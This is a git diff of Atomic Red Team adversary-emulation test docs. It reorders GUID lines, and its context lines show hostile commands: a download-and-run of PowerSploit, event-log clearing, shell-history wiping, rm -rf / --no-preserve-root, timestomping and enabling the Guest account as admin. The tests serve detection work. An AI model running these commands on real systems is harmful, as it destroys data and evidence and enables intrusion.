## Atomic Test #6 - Find Local Admins via Group Policy (PowerView) - -auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a - takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 64fdb43b-5259-467a-b000-1b02c00e510a + + + #### Inputs: @@ -204,13 +216,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast) - -auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b - When successful, accounts that do not require kerberos pre-auth will be returned + **Supported Platforms:** Windows +**auto_generated_guid:** 870ba71e-6858-4f6d-895c-bb6237f6121b + + + @@ -251,14 +265,16 @@ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.
## Atomic Test #8 - Adfind - Query Active Directory Groups - -auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 48ddc687-82af-40b7-8472-ff1e742e8274 + + + #### Inputs: diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md index 81e61b56..4f9e6f5f 100644 --- a/atomics/T1070.001/T1070.001.md +++ b/atomics/T1070.001/T1070.001.md @@ -22,13 +22,15 @@ These logs may also be cleared through other mechanisms, such as the event viewe
## Atomic Test #1 - Clear Logs - -auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967 - Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. + **Supported Platforms:** Windows +**auto_generated_guid:** e6abb60e-26b8-41da-8aae-0c35174b0967 + + + #### Inputs: @@ -53,15 +55,17 @@ wevtutil cl #{log_name}
## Atomic Test #2 - Delete System Logs Using Clear-EventLog - -auto_generated_guid: b13e9306-3351-4b4b-a6e8-477358b0b498 - Clear event logs using built-in PowerShell commands. Upon successful execution, you should see the list of deleted event logs Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it. + **Supported Platforms:** Windows +**auto_generated_guid:** b13e9306-3351-4b4b-a6e8-477358b0b498 + + + @@ -83,15 +87,17 @@ Get-EventLog -list
## Atomic Test #3 - Clear Event Logs via VBA - -auto_generated_guid: 1b682d84-f075-4f93-9a89-8a8de19ffd6e - This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error + **Supported Platforms:** Windows +**auto_generated_guid:** 1b682d84-f075-4f93-9a89-8a8de19ffd6e + + + diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md index 2715a141..e75d68d2 100644 --- a/atomics/T1070.002/T1070.002.md +++ b/atomics/T1070.002/T1070.002.md @@ -23,13 +23,15 @@
## Atomic Test #1 - rm -rf - -auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 - Delete system and audit logs + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 989cc1b1-3642-4260-a809-54f9dd559683 + + + @@ -50,13 +52,15 @@ sudo rm -rf /private/var/audit/*
## Atomic Test #2 - Overwrite Linux Mail Spool - -auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4 - This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** Linux +**auto_generated_guid:** 1602ff76-ed7f-4c94-b550-2f727b4782d4 + + + #### Inputs: @@ -81,13 +85,15 @@ echo 0> /var/spool/mail/#{username}
## Atomic Test #3 - Overwrite Linux Log - -auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 - This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** Linux +**auto_generated_guid:** d304b2dc-90b4-4465-a650-16ddd503f7b5 + + + #### Inputs: diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md index 4152771e..8d5e8582 100644 --- a/atomics/T1070.003/T1070.003.md +++ b/atomics/T1070.003/T1070.003.md @@ -40,13 +40,15 @@ Adversaries may run the PowerShell command Clear-History to flush t
## Atomic Test #1 - Clear Bash history (rm) - -auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc - Clears bash history via rm + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** a934276e-2be5-4a36-93fd-98adbb5bd4fc + + + @@ -66,13 +68,15 @@ rm ~/.bash_history
## Atomic Test #2 - Clear Bash history (echo) - -auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 - Clears bash history via rm + **Supported Platforms:** Linux +**auto_generated_guid:** cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 + + + @@ -92,13 +96,15 @@ echo "" > ~/.bash_history
## Atomic Test #3 - Clear Bash history (cat dev/null) - -auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f - Clears bash history via cat /dev/null + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** b1251c35-dcd3-4ea1-86da-36d27b54f31f + + + @@ -118,13 +124,15 @@ cat /dev/null > ~/.bash_history
## Atomic Test #4 - Clear Bash history (ln dev/null) - -auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 - Clears bash history via a symlink to /dev/null + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 + + + @@ -144,13 +152,15 @@ ln -sf /dev/null ~/.bash_history
## Atomic Test #5 - Clear Bash history (truncate) - -auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 - Clears bash history via truncate + **Supported Platforms:** Linux +**auto_generated_guid:** 47966a1d-df4f-4078-af65-db6d9aa20739 + + + @@ -170,13 +180,15 @@ truncate -s0 ~/.bash_history
## Atomic Test #6 - Clear history of a bunch of shells - -auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c - Clears the history of a bunch of different shell types by setting the history size to zero + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 7e6721df-5f08-4370-9255-f06d8a77af4c + + + @@ -198,13 +210,15 @@ history -c
## Atomic Test #7 - Clear and Disable Bash History Logging - -auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6 - Clears the history and disable bash history logging of the current shell and future shell sessions + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 784e4011-bd1a-4ecd-a63a-8feb278512e6 + + + @@ -233,13 +247,15 @@ set -o history
## Atomic Test #8 - Use Space Before Command to Avoid Logging to History - -auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6 - Using a space before a command causes the command to not be logged in the Bash History file + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 53b03a54-4529-4992-852d-a00b4b7215a6 + + + @@ -260,13 +276,15 @@ whoami
## Atomic Test #9 - Disable Bash History Logging with SSH -T - -auto_generated_guid: 5f8abd62-f615-43c5-b6be-f780f25790a1 - Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog + **Supported Platforms:** Linux +**auto_generated_guid:** 5f8abd62-f615-43c5-b6be-f780f25790a1 + + + @@ -304,13 +322,15 @@ yum -y install sshpass
## Atomic Test #10 - Prevent Powershell History Logging - -auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 - Prevents Powershell history + **Supported Platforms:** Windows +**auto_generated_guid:** 2f898b81-3e97-4abb-bc3f-a95138988370 + + + @@ -334,13 +354,15 @@ Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
## Atomic Test #11 - Clear Powershell History by Deleting History File - -auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 - Clears Powershell history + **Supported Platforms:** Windows +**auto_generated_guid:** da75ae8d-26d6-4483-b0fe-700e4df4f037 + + + diff --git a/atomics/T1070.004/T1070.004.md b/atomics/T1070.004/T1070.004.md index 783f63dc..f5bd9b21 100644 --- a/atomics/T1070.004/T1070.004.md +++ b/atomics/T1070.004/T1070.004.md @@ -30,13 +30,15 @@ There are tools available from the host operating system to perform cleanup, but
## Atomic Test #1 - Delete a single file - Linux/macOS - -auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 - Delete a single file from the temporary directory + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480 + + + #### Inputs: @@ -61,13 +63,15 @@ rm -f #{file_to_delete}
## Atomic Test #2 - Delete an entire folder - Linux/macOS - -auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e - Recursively delete the temporary directory and all files contained within it + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e + + + #### Inputs: @@ -92,13 +96,15 @@ rm -rf #{folder_to_delete}
## Atomic Test #3 - Overwrite and delete a file with shred - -auto_generated_guid: 039b4b10-2900-404b-b67f-4b6d49aa6499 - Use the `shred` command to overwrite the temporary file and then delete it + **Supported Platforms:** Linux +**auto_generated_guid:** 039b4b10-2900-404b-b67f-4b6d49aa6499 + + + #### Inputs: @@ -123,14 +129,16 @@ shred -u #{file_to_shred}
## Atomic Test #4 - Delete a single file - Windows cmd - -auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 - Delete a single file from the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** 861ea0b4-708a-4d17-848d-186c9c7f17e3 + + + #### Inputs: @@ -167,14 +175,16 @@ echo deleteme_T1551.004 >> #{file_to_delete}
## Atomic Test #5 - Delete an entire folder - Windows cmd - -auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 - Recursively delete a folder in the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** ded937c4-2add-42f7-9c2c-c742b7a98698 + + + #### Inputs: @@ -211,13 +221,15 @@ mkdir #{folder_to_delete}
## Atomic Test #6 - Delete a single file - Windows PowerShell - -auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 - Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 + + + #### Inputs: @@ -254,13 +266,15 @@ New-Item -Path #{file_to_delete} | Out-Null
## Atomic Test #7 - Delete an entire folder - Windows PowerShell - -auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 - Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** edd779e4-a509-4cba-8dfa-a112543dbfb1 + + + #### Inputs: @@ -297,13 +311,15 @@ New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
## Atomic Test #8 - Delete Filesystem - Linux - -auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 - This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. + **Supported Platforms:** Linux +**auto_generated_guid:** f3aa95fe-4f10-4485-ad26-abf22a764c52 + + + @@ -323,14 +339,16 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
## Atomic Test #9 - Delete Prefetch File - -auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb - Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count" before and after the test to verify that the number of prefetch files decreases by 1. + **Supported Platforms:** Windows +**auto_generated_guid:** 36f96049-0ad7-4a5f-8418-460acaeb92fb + + + @@ -350,17 +368,19 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
## Atomic Test #10 - Delete TeamViewer Log Files - -auto_generated_guid: 69f50a5f-967c-4327-a5bb-e1a9a9983785 - Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. https://twitter.com/SBousseaden/status/1197524463304290305?s=20 + **Supported Platforms:** Windows +**auto_generated_guid:** 69f50a5f-967c-4327-a5bb-e1a9a9983785 + + + #### Inputs: diff --git a/atomics/T1070.005/T1070.005.md b/atomics/T1070.005/T1070.005.md index f784ce96..c27abeb0 100644 --- a/atomics/T1070.005/T1070.005.md +++ b/atomics/T1070.005/T1070.005.md @@ -14,13 +14,15 @@
## Atomic Test #1 - Add Network Share - -auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 - Add a Network Share utilizing the command_prompt + **Supported Platforms:** Windows +**auto_generated_guid:** 14c38f32-6509-46d8-ab43-d53e32d2b131 + + + #### Inputs: @@ -46,13 +48,15 @@ net share test=#{share_name} /REMARK:"test share" /CACHE:No
## Atomic Test #2 - Remove Network Share - -auto_generated_guid: 09210ad5-1ef2-4077-9ad3-7351e13e9222 - Removes a Network Share utilizing the command_prompt + **Supported Platforms:** Windows +**auto_generated_guid:** 09210ad5-1ef2-4077-9ad3-7351e13e9222 + + + #### Inputs: @@ -77,13 +81,15 @@ net share #{share_name} /delete
## Atomic Test #3 - Remove Network Share PowerShell - -auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 - Removes a Network Share utilizing PowerShell + **Supported Platforms:** Windows +**auto_generated_guid:** 0512d214-9512-4d22-bde7-f37e058259b3 + + + #### Inputs: diff --git a/atomics/T1070.006/T1070.006.md b/atomics/T1070.006/T1070.006.md index 11fb1413..752ef9b0 100644 --- a/atomics/T1070.006/T1070.006.md +++ b/atomics/T1070.006/T1070.006.md @@ -26,13 +26,15 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr
## Atomic Test #1 - Set a file's access timestamp - -auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 - Stomps on the access timestamp of a file + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810 + + + #### Inputs: @@ -57,13 +59,15 @@ touch -a -t 197001010000.00 #{target_filename}
## Atomic Test #2 - Set a file's modification timestamp - -auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 - Stomps on the modification timestamp of a file + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52 + + + #### Inputs: @@ -88,16 +92,18 @@ touch -m -t 197001010000.00 #{target_filename}
## Atomic Test #3 - Set a file's creation timestamp - -auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b - Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b + + + #### Inputs: @@ -126,15 +132,17 @@ stat #{target_filename}
## Atomic Test #4 - Modify file timestamps using reference file - -auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50 - Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50 + + + #### Inputs: @@ -160,14 +168,16 @@ touch -acmr #{reference_file_path} #{target_file_path}
## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell - -auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c - Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970. + **Supported Platforms:** Windows +**auto_generated_guid:** b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c + + + #### Inputs: @@ -210,14 +220,16 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell - -auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 - Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970. + **Supported Platforms:** Windows +**auto_generated_guid:** f8f6634d-93e1-4238-8510-f8a90a20dcf2 + + + #### Inputs: @@ -260,14 +272,16 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell - -auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 - Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970. + **Supported Platforms:** Windows +**auto_generated_guid:** da627f63-b9bd-4431-b6f8-c5b44d061a62 + + + #### Inputs: @@ -310,17 +324,19 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #8 - Windows - Timestomp a File - -auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 - Timestomp kxwn.lock. Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. [Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml) + **Supported Platforms:** Windows +**auto_generated_guid:** d7512c33-3a75-4806-9893-69abc3ccdd43 + + + #### Inputs: diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index 159510d9..d91dd8db 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -12,14 +12,16 @@ These actions may interfere with event collection, reporting, or other notificat
## Atomic Test #1 - Indicator Removal using FSUtil - -auto_generated_guid: b4115c7a-0e92-47f0-a61e-17e7218b2435 - Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn + **Supported Platforms:** Windows +**auto_generated_guid:** b4115c7a-0e92-47f0-a61e-17e7218b2435 + + + diff --git a/atomics/T1071.001/T1071.001.md b/atomics/T1071.001/T1071.001.md index 58a4fe43..8722d0bc 100644 --- a/atomics/T1071.001/T1071.001.md +++ b/atomics/T1071.001/T1071.001.md @@ -16,16 +16,18 @@ Protocols such as HTTP and HTTPS that carry web traffic may be very common in en
## Atomic Test #1 - Malicious User Agents - Powershell - -auto_generated_guid: 81c13829-f6c9-45b8-85a6-053366d55297 - This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat + **Supported Platforms:** Windows +**auto_generated_guid:** 81c13829-f6c9-45b8-85a6-053366d55297 + + + #### Inputs: @@ -53,16 +55,18 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
## Atomic Test #2 - Malicious User Agents - CMD - -auto_generated_guid: dc3488b0-08c7-4fea-b585-905c83b48180 - This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat + **Supported Platforms:** Windows +**auto_generated_guid:** dc3488b0-08c7-4fea-b585-905c83b48180 + + + #### Inputs: @@ -107,14 +111,16 @@ Remove-Item $env:temp\curl.zip
## Atomic Test #3 - Malicious User Agents - Nix - -auto_generated_guid: 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 - This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 + + + #### Inputs: diff --git a/atomics/T1071.004/T1071.004.md b/atomics/T1071.004/T1071.004.md index 17f935e4..d637d611 100644 --- a/atomics/T1071.004/T1071.004.md +++ b/atomics/T1071.004/T1071.004.md @@ -18,15 +18,17 @@ The DNS protocol serves an administrative function in computer networking and th
## Atomic Test #1 - DNS Large Query Volume - -auto_generated_guid: 1700f5d6-5a44-487b-84de-bc66f507b0a6 - This test simulates an infected host sending a large volume of DNS queries to a command and control server. The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. + **Supported Platforms:** Windows +**auto_generated_guid:** 1700f5d6-5a44-487b-84de-bc66f507b0a6 + + + #### Inputs: @@ -54,15 +56,17 @@ for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}"
## Atomic Test #2 - DNS Regular Beaconing - -auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 - This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time. This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. + **Supported Platforms:** Windows +**auto_generated_guid:** 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 + + + #### Inputs: @@ -93,15 +97,17 @@ Set-Location PathToAtomicsFolder
## Atomic Test #3 - DNS Long Domain Query - -auto_generated_guid: fef31710-223a-40ee-8462-a396d6b66978 - This test simulates an infected host returning data to a command and control server using long domain names. The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. Upon execution, DNS information about the domain will be displayed for each callout. + **Supported Platforms:** Windows +**auto_generated_guid:** fef31710-223a-40ee-8462-a396d6b66978 + + + #### Inputs: @@ -129,18 +135,20 @@ Set-Location PathToAtomicsFolder
## Atomic Test #4 - DNS C2 - -auto_generated_guid: e7bf9802-2e78-4db9-93b5-181b7bcd37d7 - This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. The following blogs have more information. https://github.com/iagox86/dnscat2 https://github.com/lukebaggett/dnscat2-powershell + **Supported Platforms:** Windows +**auto_generated_guid:** e7bf9802-2e78-4db9-93b5-181b7bcd37d7 + + + #### Inputs: diff --git a/atomics/T1072/T1072.md b/atomics/T1072/T1072.md index 7148ce67..e4d9008d 100644 --- a/atomics/T1072/T1072.md +++ b/atomics/T1072/T1072.md @@ -14,13 +14,15 @@ The permissions required for this action vary by system configuration; local cre
## Atomic Test #1 - Radmin Viewer Utility - -auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129 - An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. + **Supported Platforms:** Windows +**auto_generated_guid:** b4988cad-6ed2-434d-ace5-ea2670782129 + + + #### Inputs: diff --git a/atomics/T1074.001/T1074.001.md b/atomics/T1074.001/T1074.001.md index 99d5bd9a..18147371 100644 --- a/atomics/T1074.001/T1074.001.md +++ b/atomics/T1074.001/T1074.001.md @@ -14,14 +14,16 @@
## Atomic Test #1 - Stage data from Discovery.bat - -auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f - Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 107706a5-6f9f-451a-adae-bab8c667829f + + + #### Inputs: @@ -50,13 +52,15 @@ Remove-Item -Force #{output_file} -ErrorAction Ignore
## Atomic Test #2 - Stage data from Discovery.sh - -auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 - Utilize curl to download discovery.sh and execute a basic information gathering shell script + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 39ce0303-ae16-4b9e-bb5b-4f53e8262066 + + + #### Inputs: @@ -81,14 +85,16 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp - -auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a - Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. + **Supported Platforms:** Windows +**auto_generated_guid:** a57fbe4b-3440-452a-88a7-943531ac872a + + + #### Inputs: diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index 3f1b6291..3d3aef89 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -12,14 +12,16 @@ Default accounts are not limited to client machines, rather also include account
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges - -auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections. + **Supported Platforms:** Windows +**auto_generated_guid:** 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 + + + #### Inputs: diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md index 88b2cf6e..5bc00429 100644 --- a/atomics/T1078.003/T1078.003.md +++ b/atomics/T1078.003/T1078.003.md @@ -12,13 +12,15 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
## Atomic Test #1 - Create local account with admin priviliges - -auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 - After execution the new account will be active and added to the Administrators group + **Supported Platforms:** Windows +**auto_generated_guid:** a524ce99-86de-4db6-b4f9-e08f35a47a15 + + + diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 579b4cce..d83db839 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -34,13 +34,15 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
## Atomic Test #1 - System Information Discovery - -auto_generated_guid: 66703791-c902-4560-8770-42b8a91f7667 - Identify System Info. Upon execution, system info and time info will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 66703791-c902-4560-8770-42b8a91f7667 + + + @@ -61,13 +63,15 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
## Atomic Test #2 - System Information Discovery - -auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 - Identify System Info + **Supported Platforms:** macOS +**auto_generated_guid:** edff98ec-0f73-4f63-9890-6b117092aff6 + + + @@ -88,13 +92,15 @@ ls -al /Applications
## Atomic Test #3 - List OS Information - -auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c - Identify System Info + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c + + + #### Inputs: @@ -128,13 +134,15 @@ rm #{output_file} 2>/dev/null
## Atomic Test #4 - Linux VM Check via Hardware - -auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec - Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. + **Supported Platforms:** Linux +**auto_generated_guid:** 31dad7ad-2286-4c02-ae92-274418c85fec + + + @@ -161,13 +169,15 @@ if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
## Atomic Test #5 - Linux VM Check via Kernel Modules - -auto_generated_guid: 8057d484-0fae-49a4-8302-4812c4f1e64e - Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. + **Supported Platforms:** Linux +**auto_generated_guid:** 8057d484-0fae-49a4-8302-4812c4f1e64e + + + @@ -191,13 +201,15 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
## Atomic Test #6 - Hostname Discovery (Windows) - -auto_generated_guid: 85cfbf23-4a1e-4342-8792-007e004b975f - Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 85cfbf23-4a1e-4342-8792-007e004b975f + + + @@ -217,13 +229,15 @@ hostname
## Atomic Test #7 - Hostname Discovery - -auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 - Identify system hostname for Linux and macOS systems. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133 + + + @@ -243,13 +257,15 @@ hostname
## Atomic Test #8 - Windows MachineGUID Discovery - -auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 - Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. + **Supported Platforms:** Windows +**auto_generated_guid:** 224b4daf-db44-404e-b6b2-f4d1f0126ef8 + + + @@ -269,16 +285,18 @@ REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
